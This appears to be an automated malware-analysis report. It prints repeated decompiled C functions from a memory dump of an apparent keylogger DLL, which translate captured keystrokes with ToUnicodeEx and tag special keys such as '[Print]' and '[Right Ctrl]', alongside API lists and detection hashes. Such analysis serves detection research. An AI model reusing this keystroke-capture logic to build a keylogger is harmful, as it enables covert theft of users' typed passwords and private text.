                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Pause]
                  • API String ID: 783433895-3639855092
                  • Opcode ID: 3ddccb20161475669b32e0ed3f5f6986b7ff8bc474ac456663870ed987cadc77
                  • Instruction ID: f377d357f69d7f331ddfabdbfb855c93a3b8fb647f7e8fffab3015d3f91a404c
                  • Opcode Fuzzy Hash: 3ddccb20161475669b32e0ed3f5f6986b7ff8bc474ac456663870ed987cadc77
                  • Instruction Fuzzy Hash: 6231C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007640(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Print]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Print]
                  • API String ID: 783433895-2723926450
                  • Opcode ID: 71e1bbc33dcade09357cc993f120fda1afbf8fb62500d9a110b3f8fbfb4a5a8d
                  • Instruction ID: 24b1e428621fc0ddc22d7c61b343553baf738b43ed31914f1cc8e82f23897795
                  • Opcode Fuzzy Hash: 71e1bbc33dcade09357cc993f120fda1afbf8fb62500d9a110b3f8fbfb4a5a8d
                  • Instruction Fuzzy Hash: 8731C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007651(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Page Up]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Page Up]
                  • API String ID: 783433895-227267868
                  • Opcode ID: ed868094e9fb9788b0736906f1eab0e99cfbf2a70a189b7d5b275534b12506be
                  • Instruction ID: d1f179d62c1294aab4835214f7be03122cb2be3f790280f2a5ffd5127ba462cb
                  • Opcode Fuzzy Hash: ed868094e9fb9788b0736906f1eab0e99cfbf2a70a189b7d5b275534b12506be
                  • Instruction Fuzzy Hash: 0331C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007662(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Right Ctrl]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Right Ctrl]
                  • API String ID: 783433895-2161099509
                  • Opcode ID: 37b88f1e4698b1e3016850942fdcabb82c0df24804045081dcb261375e4b9424
                  • Instruction ID: 8e6155c5c846e0b52aba043055f7dd5c5d9cb4f960ca40d31a8d32a727805560
                  • Opcode Fuzzy Hash: 37b88f1e4698b1e3016850942fdcabb82c0df24804045081dcb261375e4b9424
                  • Instruction Fuzzy Hash: A631C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007670(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Arrow Right]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  Instruction address column for the listing above (range 0x10007670 to 0x100078b6)

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Arrow Right]
                  • API String ID: 783433895-2747614471
                  • Opcode ID: aca24b8e51f7e3e1dab343980e379713395e851feaea9de910577454060b53af
                  • Instruction ID: d55769cdf0c3d80231fc2ac86e76adf7b4e32c99f9af14db686804d95fffef21
                  • Opcode Fuzzy Hash: aca24b8e51f7e3e1dab343980e379713395e851feaea9de910577454060b53af
                  • Instruction Fuzzy Hash: 3931C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489B24ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E1000767E(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Right Alt]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  Instruction address column for the listing above (range 0x1000767e to 0x100078b6)

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Right Alt]
                  • API String ID: 783433895-444060433
                  • Opcode ID: d9417e567954be7a013c4a1f352142b679dc3c107156d497e706b0c1705b6daf
                  • Instruction ID: afd7f63f49bfae50f92b7a44b0612bc8afbb30cc7fb8ea37a6cc1a6026fb1e9c
                  • Opcode Fuzzy Hash: d9417e567954be7a013c4a1f352142b679dc3c107156d497e706b0c1705b6daf
                  • Instruction Fuzzy Hash: 4231C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489724ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E1000768C(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Scrol Lock]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  Instruction address column for the listing above (range 0x1000768c to 0x100078b6)

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
